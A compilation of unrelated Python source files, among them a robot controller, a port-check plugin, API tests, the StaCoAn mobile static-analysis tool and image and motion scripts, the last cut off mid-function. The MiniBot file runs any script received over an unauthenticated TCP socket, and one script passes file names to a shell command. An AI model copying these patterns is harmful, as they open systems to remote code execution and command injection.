**kwargs (:obj:`dict`): keyword arguments to ``exec_sedml_docs_in_combine_archive``
Returns:
: obj: `tuple`:
*: obj:`SedDocumentResults`: results
*: obj:`dict` in the ``SimulationRunResults`` schema: log
"""
api = get_simulator_api(api_name)
results, log = api.exec_sedml_docs_in_combine_archive(*args, **kwargs)
if log:
log = log.to_json()
return results, log
class Process(multiprocessing.context.ForkProcess):
""" Fork process which collects the exceptions of its child
Attributes:
_parent_conn (:obj:`multiprocessing.connection.Connection`): connection for the parent
_child_conn (:obj:`multiprocessing.connection.Connection`): connection for the child
_exception (:obj:`Exception` or :obj:`None`): exception, if any, from the process' child
Inspired by https: // stackoverflow.com/questions/19924104/
"""
def __init__(self, *args, **kwargs):
super(multiprocessing.context.ForkProcess, self).__init__(*args, **kwargs)
self._parent_conn, self._child_conn = multiprocessing.Pipe()
self._exception = None
def run(self):
""" Run the process """
try:
super(multiprocessing.context.ForkProcess, self).run()
self._child_conn.send(False)
except Exception as exception:
self._child_conn.send(exception.with_traceback(sys.exc_info()[2]))
@property
def exception(self):
""" Get the exception from process' child, if any
Returns:
:obj:`Exception` or :obj:`None`: exception, if any, from the process' child
"""
if self._parent_conn.poll():
self._exception = self._parent_conn.recv()
return self._exception
def exec_in_subprocess(func, *args, poll_interval=0.01, timeout=None, **kwargs):
""" Execute a function in a fork
Args:
func (:obj:`types.FunctionType`): function
* args (:obj:`list`): list of positional arguments for the function
poll_interval (:obj:`float`, optional): interval to poll the status of the subprocess
timeout (:obj:`float`, optional): maximum execution time in seconds
**kwargs (:obj:`dict`, optional): dictionary of keyword arguments for the function
Returns:
:obj:`object`: result of the function
"""
context_instance = multiprocessing.get_context('fork')
queue = context_instance.Queue()
process = Process(target=subprocess_target, args=[queue, func] + list(args), kwargs=kwargs)
process.start()
start_time = time.time()
while process.exception is None:
time.sleep(poll_interval)
if timeout is not None and (time.time() - start_time) > timeout:
raise TimeoutError('Execution did not complete in {} s.'.format(timeout))
if process.exception:
raise process.exception
results = queue.get()
return results
def subprocess_target(queue, func, *args, **kwargs):
""" Target executer for a subprocess
Args:
queue (:obj:`multiprocessing.queues.Queue`): queue to send the results of the function to
func (:obj:`types.FunctionType`): function to execute
args (:obj:`list`): list of positional arguments for the function
kwargs (:obj:`dict`): dictionary of keyword arguments for the function
"""
result = func(*args, **kwargs)
queue.put(result)
|
main.py
|
import json, time, multiprocessing, importlib, sys
import MiniBotFramework
from threading import Thread
from multiprocessing import Process
from multiprocessing.managers import BaseManager
from Queue import Queue
# Constants
CONFIG_LOCATION = "MiniBotConfig/config.json"
def main():
#BaseManager.register('MiniBot',MiniBotFramework.MiniBot.MiniBot)
#manager = BaseManager()
#manager.start()
#p = multiprocessing.Process(target=time.sleep, args=(1000,))
p = None
print("Initializing MiniBot Software")
# Load config
config_file = open(CONFIG_LOCATION)
config = json.loads(config_file.read())
bot = MiniBotFramework.MiniBot.MiniBot(config)
# Initialize TCP
tcpInstance = None
if config["acceptTcp"]:
tcpInstance = MiniBotFramework.Communication.TCP.TCP()
# Initialize UDP broadcast
if config["discoverable"]:
thread_udp = Thread(target = MiniBotFramework.Communication.UDP.udpBeacon)
thread_udp.start()
# If startup script specified, run it
if config["startupScript"] != "":
# TODO Allow uploading startup scripts!
pass
accept_xbox = False
if config["acceptXbox"]:
accept_xbox = True
xboxInstance = MiniBotFramework.Controls.Xbox.Xbox()
print("Entering main loop")
# Main loop
while True:
# Poll TCP Connection
tcpCmd = tcpInstance.get_command()
if tcpCmd != "":
x = parse_command(tcpCmd, bot, p)
if x is not None:
p = x
# Poll Xbox
if accept_xbox and MiniBotFramework.Controls.Xbox.Xbox.updated:
MiniBotFramework.Controls.Xbox.Xbox.updated = False
x_left = MiniBotFramework.Controls.Xbox.Xbox.left
x_right = MiniBotFramework.Controls.Xbox.Xbox.right
bot.get_actuator_by_name("two_wheel_movement").move(x_left,x_right)
# Check on the main code
time.sleep(0.001)
def parse_command(cmd, bot, p):
comma = cmd.find(",")
start = cmd.find("<<<<")
end = cmd.find(">>>>")
key = cmd[start+4:comma]
value = cmd[comma+1:end]
if key == "WHEELS":
try:
values = value.split(",")
bot.get_actuator_by_name("two_wheel_movement").move(int(float(values[0])),int(float(values[1])))
except Exception as e:
print(e)
print("oh no!")
pass
elif key == "SCRIPT":
user_script_file = open("MiniBotScripts/UserScript.py",'w')
user_script_file.write(value)
user_script_file.close()
p = spawn_script_process(p, bot)
return p
elif key == "RUN":
p = spawn_named_script_process(p, bot, value)
else:
bot.extraCMD.put( (key, value) )
print("Unknown key: " + key)
print("Cmd: " + cmd)
return None
def spawn_script_process(p,bot):
if (p is not None and p.is_alive()):
p.terminate()
time.sleep(0.1)
p = Thread(target=run_script, args=[bot])
p.start()
# Return control to main after .1 seconds
return p
def spawn_named_script_process(p,bot,name):
if (p is not None and p.is_alive()):
p.terminate()
time.sleep(0.1)
p = Thread(target=run_script_with_name, args=[bot,name])
p.start()
# Return control to main after .1 seconds
return p
def run_script_with_name(bot,script_name):
sys.path.insert(0, './lib')
UserScript = importlib.import_module("MiniBotScripts." + script_name)
UserScript.run(bot)
def run_script(bot):
from MiniBotScripts import UserScript
UserScript.run(bot)
if (__name__ == "__main__"):
main()
|
init.py
|
#!/usr/bin/env python
# Copyright 2014 Boundary, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import socket
import json
from threading import Thread, Lock
from port_scanner import PortScanner
class PortScanPlugin:
def __init__(self):
self.host = None
self.port = None
self.pollInterval = None
self.source = socket.gethostname()
self.result = None
self.response = None
self.config = None
def parse_configuration(self):
with open('param.json') as f:
self.config = json.load(f)
def execute(self):
self.parse_configuration()
self.run()
def run(self):
stdoutmutex = Lock() # same as thread.allocate_lock()
threads = []
config_items = self.config['items']
print(len(config_items))
for item in config_items:
host = item['host']
port = item['port']
source = item['source']
if len(source) == 0:
source = host
interval = item['pollInterval']
print(host)
p = PortScanner(host=host,
port=port,
source=source,
interval=interval,
mutex=stdoutmutex)
thread = Thread(target=p.scan_port())
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join() # wait for thread exits
if __name__ == "__main__":
p = PortScanPlugin()
p.execute()
|
divae.py
|
import configparser
import socket
import threading
import signal
import os
import sys
import traceback
import base64
import select
import json
from threading import Timer
sys.path.append( "lib" )
from iseclogger import Logger
from commandprocessor import CommandProcessor
from threading import Thread
from configuration import LocalConfiguration
from peripheralscontrol import PeripheralController
import pdb
import urllib.request
#pdb.set_trace()
mainApp = None
class ReporterTimer():
def __init__(self, delay):
self.awesum="hh"
self.timer = Timer(delay,self.say_hello,args=["WOW"])
def say_hello(self,message):
self.awesum=messgae
#REPORTING_INTERVAL = 15
class DiversityMain:
port = None
name = None
logger = None
main_thread = None
listenerSocket = None
senderSocket = None
localConfig = None;
periphController = None
commandProcessor = None
def __init__(self, localConfig, logger):
self.localConfig = localConfig
self.logger = logger
self.periphController = PeripheralController()
self.commandProcessor = CommandProcessor(logger,self.periphController, self.localConfig)
def start(self):
self.event = threading.Event();
self.main_thread = Thread(target = self.startMainThread, args = ("test", ))
self.main_thread.start()
self.periphController.startThread()
def startMainThread(self, teset):
self.startReportingTimer()
self.event.wait();
self.logger.write("reporttimer","out");
def startReportingTimer(self):
if(self.event.isSet()):
self.logger.write("reporttimer","Not restarting")
else:
self.timer = Timer(1,self.doReport,args=["WOW"])
self.timer.start()
freqcounter = 0;
reportAtStartup = True;
def doReport(self, message):
global localConfig;
freq = int(localConfig.connectfreq)
#self.logger.write("main_thread","reporting")
self.freqcounter += 1;
if(self.freqcounter >= freq or self.commandProcessor.wantPostNow() == True or self.reportAtStartup == True):
self.reportAtStartup = False;
self.freqcounter = 0;
self.postalive()
self.startReportingTimer()
def join(self):
self.main_thread.join();
def stop(self):
self.periphController.stopThread();
self.timer.cancel();
self.event.set();
def postalive(self):
postdata = {'cid': localConfig.clientid, 'psw' : localConfig.password }
self.commandProcessor.postAlive()
def signal_handler(signal, frame):
print('You pressed Ctrl+C!')
mainApp.stop();
log = Logger("logs/mainlog","txt", True)
log.write("main", "Starting")
localConfig = LocalConfiguration(log)
localConfig.load()
log.write("main", "Starting main thread")
mainApp = DiversityMain(localConfig, log)
mainApp.start()
signal.signal(signal.SIGINT, signal_handler)
print('Press Ctrl+C')
signal.pause()
log.write("main", "joining")
mainApp.join()
log.write("main", "completed")
|
test_api_simple.py
|
import json
import os
import shutil
import sys
import time
import unittest
from multiprocessing import Process
import requests
from app import api
from app import configs
from app import generator
from common import posts
ec = configs.EnjoliverConfig(importer=__file__)
class TestAPI(unittest.TestCase):
p_matchbox = Process
int_path = "%s" % os.path.dirname(__file__)
dbs_path = "%s/dbs" % int_path
tests_path = "%s" % os.path.dirname(int_path)
app_path = os.path.dirname(tests_path)
project_path = os.path.dirname(app_path)
matchbox_path = "%s/matchbox" % project_path
assets_path = "%s/matchbox/assets" % project_path
test_matchbox_path = "%s/test_matchbox" % tests_path
@staticmethod
def process_target_matchbox():
os.environ["ENJOLIVER_MATCHBOX_PATH"] = TestAPI.test_matchbox_path
os.environ["ENJOLIVER_MATCHBOX_ASSETS"] = TestAPI.assets_path
cmd = [
"%s" % sys.executable,
"%s/manage.py" % TestAPI.project_path,
"matchbox",
]
print("PID -> %s\n"
"exec -> %s\n" % (
os.getpid(), " ".join(cmd)))
sys.stdout.flush()
os.execve(cmd[0], cmd, os.environ)
@classmethod
def setUpClass(cls):
time.sleep(0.1)
try:
os.remove(ec.db_path)
except OSError:
pass
smart = api.SmartDatabaseClient(ec.db_uri)
smart.create_base()
api.SMART = smart
api.repositories = api.RepositoriesRegister(smart)
api.CACHE.clear()
shutil.rmtree(ec.ignition_journal_dir, ignore_errors=True)
cls.app = api.app.test_client()
cls.app.testing = True
cls.p_matchbox = Process(target=TestAPI.process_target_matchbox)
print("PPID -> %s\n" % os.getpid())
cls.p_matchbox.start()
assert cls.p_matchbox.is_alive() is True
cls.matchbox_running(ec.matchbox_uri, cls.p_matchbox)
@classmethod
def tearDownClass(cls):
print("TERM -> %d\n" % cls.p_matchbox.pid)
sys.stdout.flush()
cls.p_matchbox.terminate()
cls.p_matchbox.join(timeout=5)
time.sleep(0.2)
@staticmethod
def matchbox_running(matchbox_endpoint, p_matchbox):
response_body = ""
response_code = 404
for i in range(10):
assert p_matchbox.is_alive() is True
try:
request = requests.get(matchbox_endpoint)
response_body = request.content
response_code = request.status_code
request.close()
break
except requests.exceptions.ConnectionError:
pass
time.sleep(0.2)
assert b"matchbox\n" == response_body
assert 200 == response_code
@staticmethod
def clean_sandbox():
dirs = ["%s/%s" % (
TestAPI.test_matchbox_path, k) for k in (
"profiles", "groups")]
for d in dirs:
for f in os.listdir(d):
if ".json" in f:
os.remove("%s/%s" % (d, f))
def setUp(self):
self.assertTrue(self.p_matchbox.is_alive())
self.clean_sandbox()
api.CACHE.clear()
def test_00_healthz(self):
expect = {
u'flask': True,
u'global': False,
u'db': True,
'discovery': {'ignition': False, 'ipxe': False},
u'matchbox': {
u'/': True,
u'/boot.ipxe': True,
u'/boot.ipxe.0': True,
u'/assets': True,
u"/metadata": True
}}
result = self.app.get('/healthz')
content = json.loads(result.data.decode())
self.assertEqual(expect, content)
self.assertEqual(result.status_code, 503)
def test_01_boot_ipxe(self):
expect = [
"#!ipxe",
"echo start /boot.ipxe",
":retry_dhcp",
"dhcp || goto retry_dhcp",
]
result = self.app.get('/boot.ipxe')
self.assertEqual(200, result.status_code)
self.assertEqual(expect, result.data.decode().split('\n')[:4])
def test_01_boot_ipxe_0(self):
expect = [
"#!ipxe",
"echo start /boot.ipxe",
":retry_dhcp",
"dhcp || goto retry_dhcp",
]
result = self.app.get('/boot.ipxe.0')
self.assertEqual(200, result.status_code)
self.assertEqual(expect, result.data.decode().split('\n')[:4])
def test_02_root(self):
result = self.app.get('/')
self.assertEqual(result.status_code, 200)
def test_03_ipxe_404(self):
self.app.get('/ipxe')
def test_04_ipxe(self):
marker = "%s-%s" % (TestAPI.__name__.lower(), self.test_04_ipxe.__name__)
ignition_file = "inte-%s.yaml" % marker
gen = generator.Generator(
api_uri=ec.api_uri,
profile_id="id-%s" % marker,
name="name-%s" % marker,
ignition_id=ignition_file,
matchbox_path=self.test_matchbox_path)
gen.dumps()
result = self.app.get('/ipxe')
expect = "#!ipxe\n" \
"kernel " \
"%s/assets/coreos/serve/coreos_production_pxe.vmlinuz " \
"console=ttyS0 console=ttyS1 " \
"coreos.config.url=%s/ignition?uuid=${uuid}&mac=${net0/mac:hexhyp} " \
"coreos.first_boot " \
"coreos.oem.id=pxe\n" \
"initrd %s/assets/coreos/serve/coreos_production_pxe_image.cpio.gz \n" \
"boot\n" % (gen.profile.api_uri, gen.profile.api_uri, gen.profile.api_uri)
expect = str.encode(expect)
self.assertEqual(expect, result.data)
self.assertEqual(200, result.status_code)
def test_05_ipxe_selector(self):
mac = "00:00:00:00:00:00"
marker = "%s-%s" % (TestAPI.__name__.lower(), self.test_05_ipxe_selector.__name__)
ignition_file = "inte-%s.yaml" % marker
gen = generator.Generator(
api_uri=ec.api_uri,
profile_id="id-%s" % marker,
name="name-%s" % marker,
ignition_id=ignition_file,
selector={"mac": mac},
matchbox_path=self.test_matchbox_path
)
gen.dumps()
result = self.app.get('/ipxe?mac=%s' % mac)
expect = "#!ipxe\n" \
"kernel %s/assets/coreos/serve/coreos_production_pxe.vmlinuz " \
"console=ttyS0 console=ttyS1 coreos.config.url=%s/ignition?uuid=${uuid}&mac=${net0/mac:hexhyp} " \
"coreos.first_boot coreos.oem.id=pxe\n" \
"initrd %s/assets/coreos/serve/coreos_production_pxe_image.cpio.gz \n" \
"boot\n" % (gen.profile.api_uri, gen.profile.api_uri, gen.profile.api_uri)
expect = str.encode(expect)
self.assertEqual(expect, result.data)
self.assertEqual(200, result.status_code)
def test_06_discovery_400(self):
result = self.app.post('/discovery', data="ok")
self.assertEqual(result.status_code, 406)
def test_06_discovery_00(self):
result = self.app.post('/discovery', data=json.dumps(posts.M01),
content_type='application/json')
self.assertEqual(json.loads(result.data.decode()), {'new-discovery': True})
self.assertEqual(result.status_code, 200)
def test_06_discovery_01(self):
result = self.app.post('/discovery', data=json.dumps(posts.M02),
content_type='application/json')
self.assertEqual(json.loads(result.data.decode()), {'new-discovery': True})
self.assertEqual(result.status_code, 200)
result = self.app.post('/discovery', data=json.dumps(posts.M02),
content_type='application/json')
self.assertEqual(json.loads(result.data.decode()), {'new-discovery': False})
self.assertEqual(result.status_code, 200)
result = self.app.get("/discovery")
result_data = json.loads(result.data.decode())
self.assertEqual(2, len(result_data))
def test_07_404_fake(self):
result = self.app.get('/fake')
self.assertEqual(result.status_code, 404)
|
stacoan.py
|
#!/bin/python
import codecs
import hashlib
import os
import sys
import webbrowser
import configparser
import argparse
import threading
import json
import multiprocessing
from threading import Thread
from multiprocessing import Process
from time import time
from helpers.logger import Logger
from helpers.project import Project
from helpers.report_html import Report_html
from helpers.searchwords import Searchwords
from helpers.server import ServerWrapper
def parse_args():
# Description
argument_width_in_help = 30
parser = argparse.ArgumentParser(description='StaCoAn is a crossplatform tool '
'which aids developers, bugbounty hunters and ethical hackers performing static '
'code analysis on mobile applications.',
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=argument_width_in_help))
# Arguments: see https://docs.python.org/3/library/argparse.html
parser.add_argument('-p', metavar="PATH", dest='project', required=False, nargs='+',
help='Relative path to the project')
parser.add_argument('--disable-browser', action='store_true', required=False,
help='Do not automatically open the HTML report in a browser')
parser.add_argument('--enable-server', action='store_true', required=False,
help='Do not run the server to drag and drop files to be analysed')
log_group = parser.add_mutually_exclusive_group(required=False)
log_group.add_argument('--log-all', action='store_true', help='Log all errors, warnings and info messages (default)')
log_group.add_argument('--log-errors', action='store_true', help='Log only errors')
log_group.add_argument('--log-warnings', action='store_true', help='Log only errors and warning messages')
# return aur args, usage: args.argname
return parser.parse_args()
# Note that this server(args) function CANNOT be placed in the server.py file. It calls "program()", which cannot be
# called from the server.py file
def server(args, server_enabled, DRAG_DROP_SERVER_PORT):
# Windows multithreading is different on Linux and windows (fork <-> new instance without parent context and args)
child=False
if os.name == 'nt':
if os.path.exists(".temp_thread_file"):
with open(".temp_thread_file") as f:
content = f.readlines()
# you may also want to remove whitespace characters like `\n` at the end of each line
content = [x.strip() for x in content]
args.project = [content[0]]
args.enable_server = content[1]
args.log_warnings = content[2]
args.disable_browser = content[3]
child = True
os.remove(".temp_thread_file")
if (server_enabled or args.enable_server or ((not len(sys.argv) > 1))) and (not child):
# This is a "bridge" between the stacoan program and the server. It communicates via this pipe (queue)
def serverlistener(in_q):
while True:
# Get some data
data = in_q.get()
if data == "KILLSERVERCOMMAND":
t1.isAlive = False
download_thread.isAlive = False
Logger("Server reports killed", Logger.INFO)
Logger("Exiting program! Bye. ", Logger.INFO)
exit(0)
# Process the data
args = argparse.Namespace(project=[data], enable_server=False, log_warnings=False, log_errors=False, disable_browser=True)
# On windows: write arguments to file, spawn process, read arguments from file, delete.
if os.name == 'nt':
with open('.temp_thread_file', 'a') as the_file:
the_file.write(data+"\n")
the_file.write("False\n") # enable_server
the_file.write("False\n") # log_warnings
the_file.write("True\n")
p = Process(target=program, args=(args,))
p.start()
# Create report server instance
reportserver = ServerWrapper.create_reportserver()
download_thread = threading.Thread(target=reportserver.serve_forever)
download_thread.daemon = True
download_thread.start()
# Create the shared queue and launch both threads
t1 = Thread(target=serverlistener, args=(ServerWrapper.dragdropserver.q,))
t1.daemon = True
t1.start()
dragdropserver = ServerWrapper.create_drag_drop_server()
drag_drop_server_thread = threading.Thread(target=dragdropserver.serve_forever)
drag_drop_server_thread.daemon = True
drag_drop_server_thread.start()
if not args.disable_browser:
# Open the webbrowser to the generated start page.
report_folder_start = "http:///127.0.0.1:" + str(DRAG_DROP_SERVER_PORT)
if sys.platform == "darwin": # check if on OSX
# strip off http:///
report_folder_start = str(report_folder_start).strip("http:///")
report_folder_start = "file:///" + report_folder_start
webbrowser.open(report_folder_start)
# Keep waiting until q is gone.
ServerWrapper.dragdropserver.q.join()
drag_drop_server_thread.join()
return() # Not needed because it will be killed eventually.
def program(args):
# Script cannot be called outside script directory. It contains a lot of os.getcwd().
if not os.path.dirname(os.path.abspath(__file__)) == os.getcwd():
Logger("Script cannot be called outside directory", Logger.ERROR)
# Keep track of execution time
start_time = time()
# Read information from config file
# Todo edit dockerfile with new path for report
# ToDo create a settings class that parses the ini file with set and get functions
config = configparser.ConfigParser()
config.read("config.ini")
server_enabled = config.getboolean("ProgramConfig", 'server_enabled')
DRAG_DROP_SERVER_PORT = json.loads(config.get("Server", 'drag_drop_server_port'))
# Update log level
if not (args.log_warnings or args.log_errors):
loglevel = 3
else:
loglevel = 1 if args.log_errors else 2
config.set('ProgramConfig', 'loglevel', str(loglevel))
with open("config.ini", "w+") as configfile:
config.write(configfile)
# Import the searchwords lists
Searchwords.searchwords_import(Searchwords())
# Server(args) checks if the server should be run and handles the spawning of the server and control of it
server(args, server_enabled, DRAG_DROP_SERVER_PORT)
# For each project (read .ipa or .apk file), run the scripts.
all_project_paths = args.project
if not all_project_paths:
sys.exit(0)
for project_path in all_project_paths:
try:
Project.projects[project_path] = Project(project_path)
except:
sys.exit(0)
report_folder = os.path.join(Project.projects[project_path].name, config.get("ProgramConfig", 'report_folder'))
report_folder_start = os.path.join(os.getcwd(), report_folder, "start.html")
Logger("Decompiling app...")
Project.projects[project_path].app_prepper()
Logger("Decompiling done.")
Logger("Searching trough files")
Project.projects[project_path].searchcontroller()
Logger("Searching done.")
Logger("start generating report")
# ToDo: Generate the tree-view + Source code view for each SOURCE file
all_files = dict()
all_files.update(Project.projects[project_path].db_files)
all_files.update(Project.projects[project_path].src_files)
amount_files = len(all_files)
for i, file in enumerate(all_files):
Logger("progress: "+str(format((i/amount_files)*100, '.2f'))+"%", rewriteLine=True)
hash_object = hashlib.md5(file.encode('utf-8'))
file_report_file = os.path.join(report_folder, hash_object.hexdigest()+'.html')
overview_html = Report_html(Project.projects[project_path])
overview_html.header("tree")
overview_html.navigation()
overview_html.tree_view(Project.projects[project_path], file)
overview_html.footer()
f = codecs.open(file_report_file, 'w', encoding='utf8')
f.write(overview_html.gethtml())
# with open(file_report_file, 'w') as f:
# print(overview_html.gethtml(), file=f)
Logger("progress: 100% ")
# Generate the startpage
file_report_file = os.path.join(report_folder, 'start.html')
overview_html = Report_html(Project.projects[project_path])
overview_html.header("tree")
overview_html.navigation()
overview_html.tree_view(Project.projects[project_path], "")
overview_html.footer()
f = codecs.open(file_report_file, 'w', encoding='utf8')
f.write(overview_html.gethtml())
# with open(file_report_file, 'w') as f:
# print(overview_html.gethtml(), file=f)
# Generate words overview html file
words_overview_html_report_file = os.path.join(report_folder, "wordlist_overview.html")
words_overview_html = Report_html(Project.projects[project_path])
words_overview_html.header("words_overview")
words_overview_html.navigation()
words_overview_html.html_wordlist(Project.projects[project_path])
words_overview_html.footer()
with open(words_overview_html_report_file, 'w') as f:
print(words_overview_html.gethtml(), file=f)
# Generate lootbox
lootbox_html_report_file = os.path.join(report_folder, "lootbox.html")
lootbox_html_report = Report_html(Project.projects[project_path])
lootbox_html_report.header("lootbox")
lootbox_html_report.navigation()
lootbox_html_report.lootbox()
lootbox_html_report.footer()
f = codecs.open(lootbox_html_report_file, 'w', encoding='utf8')
f.write(lootbox_html_report.gethtml())
# with open(lootbox_html_report_file, 'w') as f:
# print(lootbox_html_report.gethtml(), file=f)
# Generate the treeview
tree_js_file_path = os.path.join(report_folder, "tree_js_content.js")
f = codecs.open(tree_js_file_path, 'w', encoding='utf8')
f.write(Report_html.Tree_builder.tree_js_file(Project.projects[project_path]))
# with open(tree_js_file_path, 'w') as f:
# print(Report_html.Tree_builder.tree_js_file(Project.projects[project_path]), file=f)
# Generate looty.js file, for the zip creation process at the lootbox page
Report_html().make_loot_report_content()
# Write all log-events to logfile
Logger.dump()
# Log some end results
if loglevel == 3:
print("\n--------------------\n")
Logger("Static code analyzer completed succesfully in %fs." % (time() - start_time))
Logger("HTML report is available at: %s" % report_folder_start)
if (not args.disable_browser) and not (args.enable_server or server_enabled):
Logger("Now automatically opening the HTML report.")
# Open the webbrowser to the generated start page.
if sys.platform == "darwin": # check if on OSX
# strip off http:///
report_folder_start = str(report_folder_start).strip("http:///")
report_folder_start = "file:///" + report_folder_start
webbrowser.open(report_folder_start)
# Exit program
sys.exit()
if __name__ == "__main__":
multiprocessing.freeze_support()
if os.environ.get('DEBUG') is not None:
program(parse_args())
exit(0)
try:
program(parse_args())
except Exception as e:
Logger("ERROR: Unknown error: %s." % str(e), Logger.ERROR)
|
ImageConvertTool.py
|
"""
Helper script for using Basisu.
Usage:
$ basisu.py fixall
- TODO:
"""
import sys
import os
from shutil import copyfile
import subprocess
import threading
import time
import platform
# LIST OF COMMANDS
# -----------------------------
CMD_FIXALL = "fixall"
# -----------------------------
# HELPERS ----------------------------------------------------------------------------
def PrintHelp():
print(' ')
print('GLTF texture folder Helper for managing texture file names and folder structure.')
print(' ')
print('Usage:')
print(' basisu.py [command] [args]')
print(' ')
print('Available Commands:')
print(' ', CMD_FIXALL)
print(' ')
def CheckCommand(cmd):
if ( not cmd == CMD_FIXALL
):
return False
return True
# COMMANDS ---------------------------------------------------------------------------
def ExecCmdInit():
if len(sys.argv) < 3:
print('init: missing argument: please provide the folder name to initialize.')
return
folder_name = sys.argv[2]
# create the folder provided in the argument
try:
os.mkdir(folder_name)
except OSError:
print('Could not create directory: ', folder_name)
# change dir and create subfolders
os.chdir(folder_name)
try:
os.mkdir("2K")
except OSError:
print('Could not create directory: 2K')
try:
os.mkdir("1K")
except OSError:
print('Could not create directory: 1K')
return
def ExecCmdCheck():
print('ExecCmdCheck')
return
def FindInArray(find_array, find):
for f in find_array:
if f.lower() in find.lower():
return 1
return 0
def TexConvertFunction(basisu, filename, options):
dir_path = os.path.dirname(os.path.realpath(__file__))
basisu_fullpath = dir_path + "\\" + basisu
command = '"%s" %s %s'%(
basisu_fullpath,
options,
filename
)
print("Converting [" + filename + "]")
DEVNULL = open(os.devnull, 'wb')
p = subprocess.call(command, stdout=DEVNULL, stderr=DEVNULL)
return
def KTXCompressFunction(compress, output, filename, options):
#output = os.path.splitext(filename)[0] + ".ktx"
command = '"%s" -o "%s" %s "%s"'%(
compress,
output,
options,
filename,
)
print(command)
DEVNULL = open(os.devnull, 'wb')
p = subprocess.call(command, stdout=DEVNULL, stderr=DEVNULL, shell=True)
# p = subprocess.call(command)
return
def ExecCmdFixAll():
print('ExecCmdFixAll')
start = time.time()
basisu = "basisu.exe"
ktxcompress = "ImageConvertTools/img2ktx.exe"
relative_input_dir = ""
relative_output_dir = ""
# expect user to provide which folder to fix
if len(sys.argv) < 4:
print('fixname: missing argument: using directory of script.')
else:
relative_input_dir = sys.argv[2]
relative_output_dir = sys.argv[3]
rootdir = os.path.join(os.path.dirname(os.path.realpath(__file__)), relative_input_dir)
print("Input directory: " + rootdir)
outputdir = os.path.join(os.path.dirname(os.path.realpath(__file__)), relative_output_dir)
print("Output directory: " + outputdir)
max_open_files = 128
extensions = [ ".png" ]
tasks = []
files_to_fix = []
temp_files = []
basis_files = []
files_open = 0
bc4_list = [ ]
print("Convert all PNG to BASIS")
for subdir, dirs, files in os.walk(rootdir):
for file in files:
ext = os.path.splitext(file)[-1].lower()
if ext in extensions:
filename = (os.path.join(subdir, file))
files_to_fix.append(filename)
for file in files_to_fix:
options = "-linear -level 4 "
if "normal" in file.lower():
options = options + "-userdata0 1 " + "-seperate_rg_to_color_alpha "
ext = os.path.splitext(file)[-1].lower()
temp_files.append(os.path.splitext(file)[0] + ".png")
basis_fn = os.path.basename(file)
basis_files.append(os.path.splitext(basis_fn)[0] + ".basis")
thread_args = (basisu, file, options)
t = threading.Thread(target=TexConvertFunction, args=thread_args)
t.start()
tasks.append(t)
files_open = files_open + 1
if files_open > max_open_files:
for thread in tasks:
thread.join()
files_open = 0
tasks = []
for thread in tasks:
thread.join()
print("Copy all BASIS fiiles to Output directory")
for file in basis_files:
currentFile = os.path.basename(file)
filename = (os.path.join(os.getcwd(), file))
print("Copying " + currentFile + " to output dir")
copyfile(filename, os.path.join(outputdir, file))
for file in basis_files:
os.remove(os.path.abspath(file))
for thread in tasks:
thread.join()
print("Convert all textures to mobile compressed format")
extensions = [ ".png" ]
tasks = []
ktx_files = []
files_to_fix = []
files_open = 0
for subdir, dirs, files in os.walk(rootdir):
for file in files:
ext = os.path.splitext(file)[-1].lower()
if ext in extensions:
filename = (os.path.join(subdir, file))
files_to_fix.append(filename)
for file in files_to_fix:
options = "-m"
ext = os.path.splitext(file)[-1].lower()
compress = ktxcompress
quality = "fast"
ktx_fn = os.path.basename(file)
new_name = os.path.splitext(ktx_fn)[0] + ".ktx"
ktx_files.append(new_name)
astc = "ASTC8x8"
if "normal" in file.lower():
options = options + " -f ASTC4x4 -flags \"-normal_psnr -%s\""%(quality)
else:
options = options + " -f %s -flags \"-%s\""%(astc, quality)
# KTXCompressFunction(compress=compress, filename=file, options=options)
thread_args = (compress, outputdir + "\\" + new_name, file, options)
t = threading.Thread(target=KTXCompressFunction, args=thread_args)
t.start()
tasks.append(t)
files_open = files_open + 1
if files_open > max_open_files:
for thread in tasks:
thread.join()
files_open = 0
tasks = []
for thread in tasks:
thread.join()
end = time.time()
print(end - start)
return
# ENTRY POINT --------------------------------------------------------------------------
def Main():
# arg check
if len(sys.argv) < 2:
PrintHelp()
return
# command check
cmd = sys.argv[1]
if not CheckCommand(cmd):
print('Incorrect command: ', cmd)
PrintHelp()
return
# exec commands
if cmd == CMD_FIXALL:
ExecCmdFixAll()
# print '# args: ', len(sys.argv)
# print ':: ', str(sys.argv)
if __name__ == "__main__":
Main()
|
main_motion.py
|
# coding=utf-8
'''
python 2.7
pi@raspberrypi ~ $ echo $LANG
zh_TW.UTF-8
https://pypi.python.org/pypi/Pillow/2.2.1
https://github.com/ashtons/picam
http://host:8888/
'''
import m_settings,m_pushover,m_tornado
import picam
import logging, threading,io,struct
import datetime, time
import Image
import httplib, urllib, json
import collections, array
# False when test
lastEvtTime = 0
width = 100
height = 100
stream = io.BytesIO()
def found(q):
global lastEvtTime
lastEvtTime = time.time()
logging.info("EVENT FOUND")
m_pushover.sendPushover(q)
def initLog():
dateTag = datetime.datetime.now().strftime("%Y%b%d_%H%M%S")
logging.basicConfig(filename="mt_%s.log" % dateTag, level=logging.DEBUG,
format='%(asctime)s - %(levelname)s - %(message)s')
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.DEBUG)
# set a format which is simpler for console use
formatter = logging.Formatter('%(asctime)s : %(levelname)-8s %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
logging.info('Started')
def isMotion4(kl):
return len(kl) == 4 and kl[1] - kl[0] > 777 and kl[2] > 1000 and kl[3] > 1000
def handleMotion(k, q):
if isMotion4(k):
ediff = time.time() - lastEvtTime
logging.debug("EvtTimeDiff=%d" % ediff)
if ediff > 300:
found(q)
def main():
initLog()
t = threading.Thread(target=m_tornado.startTornado).start()
try:
runDiffCheck()
except (KeyboardInterrupt, SystemExit):
m_tornado.stopTornado()
raise
def testBinaryWrite():
return bytes(bytearray([0x13, 0x00, 0x00, 0x00, 0x08, 0x00]))
def testWriteBinJpeg():
if m_tornado.WSHandler.wsClients() > 0:
